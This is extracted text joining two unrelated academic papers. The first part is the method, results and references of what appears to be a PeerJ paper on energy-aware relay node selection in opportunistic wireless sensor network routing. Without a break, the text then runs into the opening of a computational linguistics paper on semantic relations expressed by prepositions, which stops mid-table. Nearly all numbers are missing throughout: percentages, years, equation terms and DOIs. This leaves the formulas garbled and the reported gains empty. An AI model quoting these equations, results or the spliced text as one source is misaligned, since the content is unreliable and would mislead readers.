set as %. in our proposed method, s will first use the minimum range to search for an available relay node to become the forwarder node (see fig. ). equation ( ) is adopted from alia & al-ajouri ( ) to calculate the minimum range. dminr min(i,l)d(si,sl)√ w m+h m ( ) min(i,l)d(si,sl) is the minimum distance between relay nodes. √ w m+h m is the maximum length between any two relay nodes which can be represented by the diagonal length of the monitored field. since there is more than one relay node with a threshold energy level more than or equal to %, therefore, the proposed method will give higher priority to the relay node that has the highest energy level. if there is a tie, the nearest distance will become the second priority for the selection process. if there is no relay node fulfils the minimum threshold energy level ( %), the proposed method will use the maximum range to search for any yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure determine a forwarder node using the minimum range. full-size doi: . /peerjcs. /fig- suitable relay nodes to become the forwarder node. in this example, the relay node that has a % energy level is selected as the forwarder node. to find the next forwarder node, the proposed method will use the minimum range to search for an available relay node that fulfils the minimum energy level threshold ( %). since there is no relay node fulfils the minimum energy level threshold, the proposed method then uses the maximum range to search for any suitable relay nodes to become the next forwarder node (see fig. ). equation ( ) is adopted from luo et al. ( ) to calculate the maximum range. dop=m−xh= { ( eelec)/ [ (τ− )εamp ]} /τ ( ) dop is the optimal transmission distance. m is the index of a relay node. xh is the position of the relay nodes. eelec is the energy consumption of the relay node during transmission. εamp is the energy dissipated in the transmit amplifier. τis the channel route-loss exponent of the antenna. d is the distance between the current forwarder node and the next forwarder node. in this example, the relay node that has % energy level is selected as the next forwarder node. the energy level of the previous forwarder node will be reduced after the packet is transmitted to the next forwarder node. to find the next forwarder node, the same mechanism is used. the proposed method will first use the minimum range to search for an available relay node that fulfils the minimum threshold energy level. since there are two relay nodes with the same energy level ( %), the nearest distance will become the second priority for the selection process (see fig. ). in this example, the relay node that is closest to the current forwarder node is selected as the next forwarder node. the energy level of the previous forwarder node will be reduced after the packet is transmitted to the next forwarder node. the find next forwarder node, the proposed method will use the minimum range to search for an available relay node that fulfils the minimum threshold energy level (see fig. ). since there is no relay node fulfils the minimum threshold energy level, the proposed yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure determine a forwarder node using the maximum range. full-size doi: . /peerjcs. /fig- figure determine a forwarder node using the nearest distance. full-size doi: . /peerjcs. /fig- method then uses the maximum range to search for any suitable relay nodes to become the next forwarder node. since there is no relay node fulfils the maximum threshold energy level; also, the proposed method will reduce the threshold energy level using eq. ( ). thenergy = { thenergyx ere ein if n∈gelsewire ( ) thenergy is the threshold for the energy level, ere is the residual energy of the relay node. ein is the initial energy of the relay node. g is the set of all the relay node. assuming that the new threshold energy level after the calculation is %. a broadcast message will be sent to notify each of the relay nodes about the new threshold level. the proposed method then continue using the minimum range to search for an available relay node that fulfils the new threshold energy level. in this example, the relay node that has the highest energy level is selected as the next forwarder node. the energy level of the previous forwarder node will be reduced after the packet is transmitted to the next forwarder node. yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure determine a forwarder node by decreasing the threshold energy level. full-size doi: . /peerjcs. /fig- figure transmit a packet to the destination node. full-size doi: . /peerjcs. /fig- the current forwarder node continues to search for the next available relay node within the minimum range to forward the packet. since the destination node is within the minimum range, the packet will deliver to the destination node (see fig. ). in this example, a packet only required six hops to transmit from a source node to a destination node using the proposed method (see fig. ). the pseudo-code and the flowchart of the proposed method are shown in figs. and , respectively. results the proposed method and other related works are evaluated based on the following routing metrics: latency (l): l is used to determine the average time of the packets that are successfully delivered to the destination node. yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure paths of the packet transmitted using the proposed method. full-size doi: . /peerjcs. /fig- first dead node (fdn): fdn is defined to measure the network connectivity and to check the appearance of the first dead node in the network. network lifetime (nl): nl is used to determine the energy consumption and network partition. fdn and nl are essential metrics to increase the network lifetime. receiving packets ratio (rpr): rpr is used to determine the total number of packets that are successfully received by the destination node. these aspects are used because this is the main focus of our research work. moreover, the other related works also used the same metrics for evaluation (hasnain, malik & aydin, ; luo et al., ; raman & sharma, ). therefore, we believe the evaluation and comparison can be carried out fairly. the details of each result analysis are discussed in the following subsections. result analysis for latency (l) figure illustrates the packet delivery latency comparison among the proposed method and the other related works. packet delivery latency is calculated based on the formula used by liang, luo & xu ( ) (see eq. ( )). this equation is used because it is the standard formula used to calculate the latency (l) in the opportunistic network (liang, luo & xu, ). l= n∑ i= (tcontention(k)+tdata)+(n − ) ( ) ∑n i= (x) is the summation for all relay nodes, x is the parameters, t contention(k) is the contention time, tdata is the packet transmission time, n is the number nodes. the simulation results shown that our proposed method has the lowest packet delivery latency followed by adaptive opportunistic routing (aor), energy optimization opportunistic routing (eno_or), energy savings via opportunistic routing (ens_or), opportunistic multi-hop routing (exor), geographic random forwarding (geraf) and energy-efficient opportunistic routing (eeor). on average, our proposed method yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. algorithm: relay node selection and packet forwarding s = source node f = forwarder node n = node e = energy d = destination event: s has a packet to send to the d. /*steps*/ . set threshold energy level . s select minimum range . check e for ns . if (threshold energy level ≥ the energy level of the nodes) then . do . check n with highest e . select n with highest e . goto ; . else . if (more than one n with equal e) then . do . select the nearest n . set as f . s forward the packet to f . s e will be reduced . if (packet reaches to d) . end . else . goto ; . endif . else . s select maximum range . check e for ns . if (threshold energy level ≥ the energy level of the nodes) then . do . goto ; . else . reduce threshold energy level . goto ; . endif . endif . return figure the pseudo code of the proposed method. full-size doi: . /peerjcs. /fig- yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure flowchart of the proposed method. full-size doi: . /peerjcs. /fig- yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure latency comparison. full-size doi: . /peerjcs. /fig- produces approximately . %, . %, . %, . %, . %, and . % lesser packet delivery latency compared to aor, eno_or, ens_or, exor, geraf and eeor respectively. the reason that our proposed method could perform better compared to other methods might due to the minimum or maximum range selection mechanism used. in the best case scenario, if all the forwarder nodes fulfilled the required threshold energy and used the minimum range to forward the packets, the packets could be delivered without further delay. result analysis for first dead node (fdn) figure illustrates the first dead node comparison among our proposed method and the other related works. first dead node is calculated based on the formula used by ren et al. ( ) (see eq. ( )). this equation is used because it is the standard formula used to calculate the first dead node (fdn) in the opportunistic network (ren et al., ). fdn = [ e max( )ex ] ( ) e is the initial energy of the relay node. max ( ) ex is the maximum energy consumption of the relay node. the simulation results shown that our proposed method has the highest simulation time for the first dead node followed by aor, eno_or, ens_or, exor, geraf and eeor. on average, our proposed method produces approximately . %, . %, . %, . %, . %, and . % longer simulation time for the first dead node compared to aor, eno_or, ens_or, exor, geraf and eeor respectively. the reason that our proposed method could perform better compared to other methods might due to the optimum energy level selection mechanism used. averagely, in our proposed method, if a relay node was selected to forward a packet, it normally would not be selected again in yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure first dead node comparison. full-size doi: . /peerjcs. /fig- the subsequence round to forward a packet unless it has the highest energy level among the other relay nodes and still fulfill the required threshold energy level. therefore, our proposed method could prolong the time of the first dead node at the same time we could still select the best relay node to forward the packet. result analysis for network lifetime (nl) figure illustrates the network lifetime comparison among our proposed method and the other related works. network lifetime is calculated based on the formula used by ren et al. ( ) (see eq. ( )). this equation is used because it is the standard formula used to calculate the network lifetime (nl) in the opportunistic network (ren et al., ). nl=ne − i∑ c= n∑ j= ( e(i)j ∗l (i) ) ( ) ne is the initial energy of the network, ∑i c= ∑n j= ( e(i)j ∗l (i) ) is the remaining energy of the network. e(i)j is the average energy consumption of the relay node. l (i) is the duration of the relay node. the simulation results shown that our proposed method has the highest network lifetime followed by aor, eno_or, ens_or, exor, geraf and eeor. on average, our proposed method produces approximately . %, . %, . %, . %, %, and . % higher network lifetime compared to aor, eno_or, ens_or, exor, geraf and eeor respectively. the reason that our proposed method could perform better compared to other methods might due to the selection mechanism used in our proposed method that based on nearest distance followed by the highest energy level. moreover, our proposed method could reduce the threshold energy level if a suitable relay node could not be found after using the minimum/maximum range as well as the existing threshold energy level. therefore, our proposed method could prolong the network lifetime. yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure network lifetime comparison. full-size doi: . /peerjcs. /fig- result analysis for receiving packets ratio (rpr) figure illustrates the receiving packets ratio comparison among the proposed method and the other related works. receiving packets ratio is calculated based on the formula used by ren et al. ( ) (see eq. ( )). this equation is used because it is the standard formula used to calculate the receiving packets ratio (rpr) in the opportunistic network (ren et al., ). rpr= − ∑ rdp∑ sdp ( ) ∑ rdp is the total number of packet received by the destiation node. ∑ sdpis the total number of packet sent to the destinaton node. the simulation results shown that our proposed method has the highest receiving packet ratio followed by aor, eno_or, ens_or, exor, geraf and eeor. on average, our proposed method produces . %, . %, . %, %, . %, and . % higher receiving packets ratio compared to aor, eno_or, ens_or, exor, geraf and eeor respectively. the reason that our proposed method could produce higher receiving packets ratio compared to other methods might due to the selection mechanism used in our proposed method that based on nearest distance followed by the highest energy level. additionally, our proposed method could reduce the threshold energy level if no suitable relay node could be found after using the minimum/maximum range as well as the existing threshold energy level. as a whole, the simulation results shown that our proposed method was able to perform better than the related works because of the following reasons: (i) our proposed method could use a relay node that falled within the minimum range to forward the packet if the relay node has the highest energy level. therefore, it would reduce the latency when delivering the packet to the destination node. (ii) the optimum energy level selection yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure receiving packets ratio comparison. full-size doi: . /peerjcs. /fig- mechanism used in our proposed method could reduce the chances of a forwarder node from taking part to forward a packet again unless it still has the maximum energy level compared to other relay nodes. therefore, it will prolong the time of the first dead node. (iii) our proposed method could reduce the threshold energy level from time to time if no suitable relay node is found. our selection mechanism could use the new threshold energy level together with the minimum/maximum range searching mechanism to determine a suitable relay node. as a result, our proposed method could prolong the network lifetime and produce a higher receiving packet ratio. conclusions and future work in this paper, an improved relay node selection method was proposed. the proposed method that uses the minimum or maximum range and optimum energy level to select the best relay node to forward the packet was proposed to improve the performance of routing in the opportunistic network. in our proposed method, the threshold energy level needs to be pre-configured. after that, our proposed method will use the minimum range to determine a forwarder node. the maximum range will only be used if no relay node fulfills the minimum threshold energy level within the minimum range. to select the forwarder node, priority is given to the node that has the highest energy level. if there is a tie, the nearest distance will become the second priority for the selection process. if no relay nodes meet the minimum threshold energy level, the proposed method reduces the threshold energy level and uses the same mechanism to determine a forwarder node. a broadcast message is sent to notify all the relay nodes about the new threshold level. this process is repeated until a packet is forwarded to the destination node. several simulations were conducted to evaluate the proposed method based on l, fdn, nl, and rpr. the results showed that our proposed method could (i) produce lower latency, (ii) prolong the yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. time for the first dead node, (iii) improve the network lifetime, and (iv) produce a higher receiving packet ratio compared to other methods. for future work, we intend to investigate whether it is practical to integrate our proposed method with ‘‘network coding’’. zhai et al. ( ) proposed ‘‘network coding’’ technique in . according to the authors, ‘‘network coding’’ is a technique that can be used to forward more than one packet/message in each transmission. as a result, an assumption was made that by integrating the proposed method with ‘‘network coding’’, the performance of routing in the opportunistic network could be improved. therefore, in the future, more researches would be carried out in this area. besides, we intend to investigate whether it is practical to integrate our proposed method with cognitive radio networks (crns). kafaie et al. ( ) proposed the crns technique in . crns is a paradigm of wireless communication that allows unlicensed secondary users to adjust their transmission parameters in order to achieve efficient usage of radio spectrum resources without any harmful interference to the licensed primary user. crns are getting more and more popular in the opportunistic network because it provides dynamic spectrum access, and more efficient and secure data transmission (kafaie et al., ). an assumption was made that by integrating our proposed method as one of the features or libraries in crns, it might create more revenue for researchers in this domain. however, the proposed method might not fit well in the current routing metrics in crns. therefore, in the future, more researches would be carried out to enable our proposed method to be embedded as one of the feature or library in crns. abbreviations the following abbreviations are used in this manuscript: aor adaptive opportunistic routing areor adaptive ranking based energy-efficient opportunistic routing co-eeors cooperative energy efficient optimal relay selection crns cognitive radio networks d destination node e energy eeor energy efficient opportunistic routing eno_or energy optimization opportunistic routing ens_or energy savings via opportunistic routing ett expected transmission time etx expected transmission count exor opportunistic multi-hop routing f forwarder node fdn first dead node geraf geographic random forwarding l latency mixim mixed simulator min-max range minimum and maximum range mwn multi-hop wireless networks n node yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. nl network lifetime omnet++ objective modular network testbed in c++ or opportunistic routing rpr receiving packets ratio s source node shortest-latency shortest-latency opportunistic routing in asynchronous wsns short-haul short-haul multi-hop wsns wireless sensor networks additional information and declarations funding this work was supported by the bantuan khas penyelidikan (bks - ) from the university of malaya, malaysia, postgraduate research grant under grant pg - a and also the fundamental research grant scheme (fp - a) from the ministry of higher education, malaysia. this work was also supported by king saud university, riyadh, saudi arabia, through researchers supporting project number rsp- / . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: university of malaya, malaysia: bks - . postgraduate research grant: pg - a. fundamental research grant scheme from the ministry of higher education, malaysia: fp - a. king saud university, riyadh, saudi arabia: rsp- / . competing interests the authors declare there are no competing interests. author contributions • por lip yee conceived and designed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. • shahid mehmood performed the experiments, performed the computation work, prepared figures and/or tables, and approved the final draft. • ahmad almogren analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • ihsan ali performed the experiments, analyzed the data, prepared figures and/or tables, and approved the final draft. • mohammad hossein anisi analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: the code is available in the supplemental files. yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references alia o, al-ajouri a. . maximizing wireless sensor network coverage with minimum cost using harmony search algorithm. ieee sensors journal ( ): – . biswas s, morris r. . exor: opportunistic multi-hop routing for wireless net- works. acm sigcomm computer communication review ( ): – doi . / . . boukerche a, darehshoorzadeh a. . opportunistic routing in wireless networks: models, algorithms, and classifications. acm computing surveys (csur) ( ): – . bouachir o, mnaouer ab, touati f, crescini d. . opportunistic routing and data dissemination protocol for energy harvesting wireless sensor networks. in: th ifip international conference on new technologies, mobility and security (ntms). piscataway: ieee, – . chachulski s, jennings m, katti s, katabi d. . trading structure for randomness in wireless opportunistic routing. vol. . new york: acm. chakchouk n. . a survey on opportunistic routing in wireless communica- tion networks. ieee communications surveys & tutorials ( ): – doi . /comst. . . chithaluru p, tiwari r, kumar k. . areor–adaptive ranking based energy efficient opportunistic routing scheme in wireless sensor network. computer networks : – doi . /j.comnet. . . choudhury rr, vaidya nh. . mac-layer anycasting in ad hoc networks. acm sigcomm computer communication review ( ): – . coutinho rw, boukerche a. . opportunistic routing in underwater sensor networks: potentials, challenges and guidelines. in: paper presented at the th international conference on distributed computing in sensor systems (dcoss). darehshoorzadeh a, robson e, boukerche a. . toward a comprehensive model for performance analysis of opportunistic routing in wireless mesh networks. ieee transactions on vehicular technology ( ): – . eu za, tan h-p, seah wk. . opportunistic routing in wireless sensor networks powered by ambient energy harvesting. computer networks ( ): – doi . /j.comnet. . . . hasnain m, malik mh, aydin me. . an adaptive opportunistic routing scheme for reliable data delivery in wsns. in: proceedings of the nd international conference on future networks and distributed systems. hawbani a, wang x, sharabi y, ghannami a, kuhlani h, karmoshi s. . lora: load-balanced opportunistic routing for asynchronous duty-cycled wsn. ieee transactions on mobile computing ( ): – doi . /tmc. . . yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / . http://dx.doi.org/ . /comst. . http://dx.doi.org/ . /j.comnet. . http://dx.doi.org/ . /j.comnet. . . http://dx.doi.org/ . /tmc. . http://dx.doi.org/ . /peerj-cs. jadhav p, satao r. . a survey on opportunistic routing protocols for wireless sensor networks. procedia computer science : – doi . /j.procs. . . . jain n, dongariya a, verma a. . comparative study of different types of relay selection scheme for cooperative wireless communication. in: international conference on information, communication, instrumentation and control (icicic). kafaie s, chen y, dobre oa, ahmed mh. . joint inter-flow network coding and opportunistic routing in multi-hop wireless mesh networks: a compre- hensive survey. ieee communications surveys & tutorials ( ): – doi . /comst. . . kannan g, raja tsr. . energy efficient distributed cluster head scheduling scheme for two tiered wireless sensor network. egyptian informatics journal ( ): – doi . /j.eij. . . . khan a, ali i, rahman au, imran m, mahmood h. . co-eeors: cooperative energy efficient optimal relay selection protocol for underwater wireless sensor networks. ieee access : – doi . /access. . . larsson p. . selection diversity forwarding in a multihop packet radio network with fading channel and capture. acm sigmobile mobile computing and communica- tions review ( ): – doi . / . . lee gy, haas zj. . simple, practical, and effective opportunistic routing for short- haul multi-hop wireless networks. ieee transactions on wireless communications ( ): – doi . /twc. . . . li b, li h, zhang r, wei c. . an energy-efficient metric for relay selection in large- scale multi-hop wireless networks. in: paper presented at the international conference on computing, networking and communications (icnc). liang jz. . a reliable trust computing mechanism based on multi-source feed- back and fog computing in social sensor cloud. eee internet of things journal : – . liang w, luo j, xu x. . network lifetime maximization for time-sensitive data gathering in wireless sensor networks with a mobile sink. wireless communications and mobile computing ( ): – doi . /wcm. . luo j, hu j, wu d, li r. . opportunistic routing algorithm for relay node se- lection in wireless sensor networks. ieee transactions on industrial informatics ( ): – doi . /tii. . . mao x, tang s, xu x, li x, ma h. . energy-efficient opportunistic routing in wire- less sensor. ieee transactions on parallel and distributed systems ( ): – doi . /tpds. . . menon vg. . review on opportunistic routing protocols for dynamic ad hoc networks: taxonomy, applications and future research directions. preprints . doi . /preprints . .v . nadar c, patil r, raut s, mhatre k. . energy efficient optimal opportunistic routing using sleep mode for wireless sensor network. in: international conference on innovations in information, embedded and communication systems (iciiecs). yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.procs. . . http://dx.doi.org/ . /comst. . http://dx.doi.org/ . /j.eij. . . http://dx.doi.org/ . /access. . http://dx.doi.org/ . / . http://dx.doi.org/ . /twc. . . http://dx.doi.org/ . /wcm. http://dx.doi.org/ . /tii. . http://dx.doi.org/ . /tpds. . http://dx.doi.org/ . /preprints . .v http://dx.doi.org/ . /peerj-cs. raman a, sharma s. . optimization of communication parameters in wireless sensor network. in: communication and computing systems: proceedings of the international conference on communication and computing systems (icccs ), gurgaon, india, – september, . ren j, zhang y, zhang k, liu a, chen j, shen xs. . lifetime and energy hole evolution analysis in data-gathering wireless sensor networks. ieee transactions on industrial informatics ( ): – doi . /tii. . . ritter fe, schoelles mj, quigley ks, klein lc. . human-in-the-loop simulations. cham: springer, – . thakkar a. a. alive nodes based improved low energy adaptive clustering hierarchy for wireless sensor network. in: advanced computing, networking and informatics. new york city: springer, cham. thakkar a. b. cluster head election for energy and delay constraint applications of wireless sensor network. ieee sensors journal : – . thakkar a. . a new bollinger band based energy efficient routing for clustered wireless sensor network. applied soft computing : – . thakkar a. . kip: a novel self-guided adaptive clustering approach to prolong lifetime of wireless sensor networks. in: communication and computing systems: proceedings of the international conference on communication and computing systems (icccs ). thakkar a. . deal: distance and energy based advanced leach protocol. in: international conference on information and communication technology for intelligent systems. new york city: springer. wang tz. . data collection from wsns to the cloud based on mobile fog elements. amsterdam, netherlands: elsevier. zhai z, qian j, tao y, zhao l, cheng b. . poster: a lightweight timestamp-based mac detection scheme for xor network coding in wireless sensor networks. in: paper presented at the proceedings of the th annual international conference on mobile computing and networking. zhang x, tao l, yan f, sung dk. . shortest-latency opportunistic routing in asynchronous wireless sensor networks with independent duty-cycling. ieee transactions on mobile computing : – . zhao z, mosler b, braun t. . performance evaluation of opportunistic routing protocols: a framework-based approach using omnet++. in: proceedings of the th latin american networking conference. – . zorzi m, rao rr. . geographic random forwarding (geraf) for ad hoc and sensor networks: energy and latency performance. ieee transactions on mobile computing ( ): – doi . /tmc. . . yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tii. . http://dx.doi.org/ . /tmc. . http://dx.doi.org/ . /peerj-cs. transactions of the association for computational linguistics, ( ) – . action editor: noah smith. submitted / ; revised / ; published / . c© association for computational linguistics. modeling semantic relations expressed by prepositions vivek srikumar and dan roth university of illinois, urbana-champaign urbana, il. . {vsrikum , danr}@illinois.edu abstract this paper introduces the problem of predict- ing semantic relations expressed by preposi- tions and develops statistical learning models for predicting the relations, their arguments and the semantic types of the arguments. we define an inventory of relations, build- ing on the word sense disambiguation task for prepositions and collapsing related senses across prepositions. given a preposition in a sentence, our computational task to jointly model the preposition relation and its argu- ments along with their semantic types, as a way to support the relation prediction. the an- notated data, however, only provides labels for the relation label, and not the arguments and types. we address this by presenting two mod- els for preposition relation labeling. our gen- eralization of latent structure svm gives close to % accuracy on relation labeling. further, by jointly predicting the relation, arguments, and their types along with preposition sense, we show that we can not only improve the re- lation accuracy, but also significantly improve sense prediction accuracy. introduction this paper addresses the problem of predicting se- mantic relations conveyed by prepositions in text. prepositions express many semantic relations be- tween their governor and object. predicting these can help advancing text understanding tasks like question answering and textual entailment. consider the sentence: ( ) the book of prof. alexander on primary school methods is a valuable teaching resource. here, the preposition on indicates that the book and primary school methods are connected by the relation topic and of indicates the creator- creation relation between prof. alexander and the book. predicting these relations can help answer questions about the subject of the book and also rec- ognize the entailment of sentences like prof. alexan- der has written about primary school methods. being highly polysemous, the same preposition can indicate different kinds of relations, depending on its governor and object. furthermore, several prepositions can indicate the same semantic relation. for example, consider the sentence: ( ) poor care led to her death from pneumonia. the preposition from in this sentence expresses the relation cause(death, pneumonia). in a differ- ent context, it can denote other relations, as in the phrases copied from the film (source) and recog- nized from the start (temporal). on the other hand, the relation cause can be expressed by sev- eral prepositions; for example, the following phrases express a cause relation: died of pneumonia and tired after the surgery. we characterize semantic relations expressed by transitive prepositions and develop accurate models for predicting the relations, identifying their argu- ments and recognizing the semantic types of the ar- guments. building on the word sense disambigua- tion task for prepositions, we collapse semantically related senses across prepositions to derive our re- lation inventory. these relations act as predicates in a predicate-argument representation, where the arguments are the governor and the object of the preposition. while ascertaining the arguments is a largely syntactic decision, we point out that syn- tactic parsers do not always make this prediction correctly. however, as illustrated in the examples above, identifying the relation depends on the gov- ernor and object of the preposition. given a sentence and a preposition, our goal is to model the predicate (i.e. the preposition rela- tion) and its arguments (i.e. the governor and ob- ject). very often, the relation label is not influenced by the surface form of the arguments but rather by their semantic types. in sentence ( ) above, we want the predicate to be cause when the object of the preposition is any illness. we thus suggest to model the argument types along with the preposi- tion relations and arguments, using different notions of types. these three related aspects of the rela- tion prediction task are further explained in section leading up to the problem definition. though we wish to predict relations, arguments and types, there is no corpus which annotates all three. the semeval shared task of word sense disambiguation for prepositions provides sense an- notations for prepositions. we use this data to gen- erate training and test corpora for the relation la- bels. in section , we present two models for the prepositional relation identification problem. the first model considers all possible argument candi- dates from various sources along with all argument types to predict the preposition relation label. the second model treats the arguments and types as la- tent variables during learning using a generalization of the latent structural svm of (yu and joachims, ). we show in section that this model not only predicts the arguments and types, but also im- proves relation prediction performance. the primary contributions of this paper are: . we introduce a new inventory of preposition relations that covers the prepositions that formed the basis of the semeval task of preposition sense disambiguation. . we model preposition relations, arguments and their types jointly and propose a learning algo- rithm that learns to predict all three using train- ing data that annotates only relation labels. . we show that jointly predicting relations with word sense not only improves the relation pre- dictor, but also gives a significant improvement in sense prediction. prepositions & predicate-argument semantics semantic role labeling (cf. (gildea and jurafsky, ; palmer et al., ; punyakanok et al., ) and others) is the task of converting text into a predicate-argument representation. given a trigger word or phrase in a sentence, this task solves two related prediction problems: (a) identifying the rela- tion label, and (b) identifying and labeling the argu- ments of the relation. this problem has been studied in the con- text of verb and nominal triggers using the prop- bank (palmer et al., ) and nombank (meyers et al., ) annotations over the penn treebank, and also using the framenet lexicon (fillmore et al., ), which allows arbitrary words to trigger semantic frames. this paper focuses on semantic relations ex- pressed by transitive prepositions . we can define the two prediction tasks for prepositions as follows: identifying the relation label for a preposition, and predicting the arguments of the relation. preposi- tions can mark arguments (both core and adjunct) for verbal and nominal predicates. in addition, they can also trigger relations that are not part of other predicates. for example, in sentence ( ) below, the prepositional phrase starting with to is an argument of the verb visit, but the in triggers an independent relation indicating the location of the aquarium. ( ) the children enjoyed the visit to the aquarium in coney island. framenet covers some prepositional relations, but allows only temporal, locative and directional senses of prepositions to evoke frames, accounting for only % of the targets in the semeval shared task of framenet parsing. in fact, the state-of-the-art framenet parser of (das et al., ) does not con- sider any frame inducing prepositions. (baldwin et al., ) highlights the importance of studying prepositions for a complete linguistic by transitive prepositions we refer to the standard usage of prepositions that take an object. in particular, we do not con- sider prepositional particles in our analysis. analysis of sentences and surveys work in the nlp literature that addresses the syntax and semantics of prepositions. one line of work (ye and bald- win, ) addressed the problem of preposition semantic role labeling by considering prepositional phrases that act as arguments of verbs according to the propbank annotation. they built a system that predicts the labels of these prepositional phrases alone. however, by definition, this covered only verb-attached prepositions. (zapirain et al., ) studied the impact of automatically learned selec- tional preferences for predicting arguments of verbs and showed that modeling prepositional phrases sep- arately improves the performance of argument pre- diction. preposition semantics has also been studied via the preposition project (litkowski and har- graves, ) and the related semeval shared task of word sense disambiguation of prepositions (litkowski and hargraves, ). the preposi- tion project identifies preposition senses based on their definitions in the oxford dictionary of english. there are different labels to be predicted with a wide variance in the number of senses per preposi- tion ranging from (during and as) to (on). for example, according to the preposition sense inven- tory, the preposition from in sentence ( ) above will be labeled with the sense from: ( ) to indicate a cause. (dahlmeier et al., ) added sense anno- tation to seven prepositions in four sections of the penn treebank with the goal of studying their inter- action with verb arguments. using the semeval data, (tratz and hovy, ) and (hovy et al., ) showed that the arguments offer an important cue to identify the sense of the preposition and (tratz, ) showed further im- provements by refining the sense inventory. how- ever, though these works used a dependency parser to identify arguments, in order to overcome parsing errors, they augment the parser’s predictions using part-of-speech based heuristics. we argue that, while disambiguating the sense of a preposition does indeed reveal nuances of its meaning, it leads to a proliferation of labels to be predicted. most importantly, sense labels do not transfer to other prepositions that express the same meaning. for example, both finish lunch before noon and finish lunch by noon express a temporal relation. according to the preposition project, the sense label for the first preposition is before: ( ), and that for the second is by: ( ). this both de- feats the purpose of identifying the relations to aid natural language understanding and makes the pre- diction task harder than it should be: using the stan- dard word sense classification approach, we need to train a separate classifier for each word because the labels are defined per-preposition. in other words, we cannot share features across the different prepo- sitions. this motivates the need to combine such senses of prepositions into the same class label. in this direction, (o’hara and wiebe, ) de- scribes an inventory of preposition relations ob- tained using penn treebank function tags and frame elements from framenet. (srikumar and roth, ) merged preposition senses of seven preposi- tions into relation labels. (litkowski, ) also suggests collapsing the definitions of prepositions into a smaller set of semantic classes. to aid bet- ter generalization and to reduce the label complex- ity, we follow this line of work to define a set of rela- tion labels which abstract word senses across prepo- sitions . preposition-triggered relations this section describes the inventory of preposition relations introduced in this paper, and then identifies the components of the preposition relation extraction problem. . preposition relation inventory we build our relation inventory using the sense an- notation in the preposition project, focusing on the prepositions annotated for the semeval- shared task of preposition sense disambiguation. as discussed in section , we construct the in- ventory of preposition relations by collapsing se- mantically related preposition senses across differ- since the preposition sense data is annotated over framenet sentences, sense annotation can be used to extend framenet (litkowski, ). we believe that the abstract la- bels proposed in this paper can further help in this effort. we consider the following prepositions: about, above, across, after, against, along, among, around, as, at, before, be- hind, beneath, beside, between, by, down, during, for, from, in, inside, into, like, of, off, on, onto, over, round, through, to, to- wards, and with. this does not include multi-word prepositions such as because of and due to. ent prepositions. for each sense that is defined, the preposition project also specifies related prepo- sitions. these definitions and related prepositions provide a starting point to identify senses that can be merged across prepositions. we followed this with a manual cleanup phase. some senses do not cleanly align with a single relation because the def- initions include idiomatic or figurative usage. for example, the sense in: ( ) of the preposition in, ac- cording to the definition, includes both spatial and figurative notions of the spatial sense (that is, both in london and in a film). in such cases, we sam- pled examples from the semeval training set and assigned the relation label based on majority. if sufficient examples could not be sampled, these senses were added to the label other, which is not a semantically coherent category and represents the ‘overflow’ case. overall, we have labels, which are listed in table . a companion publication (available on the authors’ website) provides detailed definitions of each relation and the senses that were merged to create each label. since we define relations to be groups of preposition sense labels, each sense can be uniquely mapped to a relation label. hence, we can use the annotated sense data from semeval to obtain a corpus of relation-labeled sentences. to validate the labeling scheme, two native speak- ers of english annotated sentences from the semeval training corpus using only the definitions of the labels as the annotation guidelines. we mea- sured cohen’s kappa coefficient (cohen, ) be- tween the annotators to be . and also between each annotator and the original corpus to be . and . respectively. . preposition relation extraction the input to the prediction problem consists of a preposition in a sentence and the goal is to jointly model the following: (i) the relation expressed by the preposition, and (ii) the arguments of the rela- tion, namely the governor and the object. we use sentence ( ) in the introduction as our run- ning example the following discussion. in our run- note that, even though we do not consider intransitive prepositions, the definitions of some relations in table could be extended apply to prepositional particles such drive down (direction) and run about (manner). relation name example activity good at boxing agent opened by annie attribute walls of stone beneficiary fight for napoleon cause 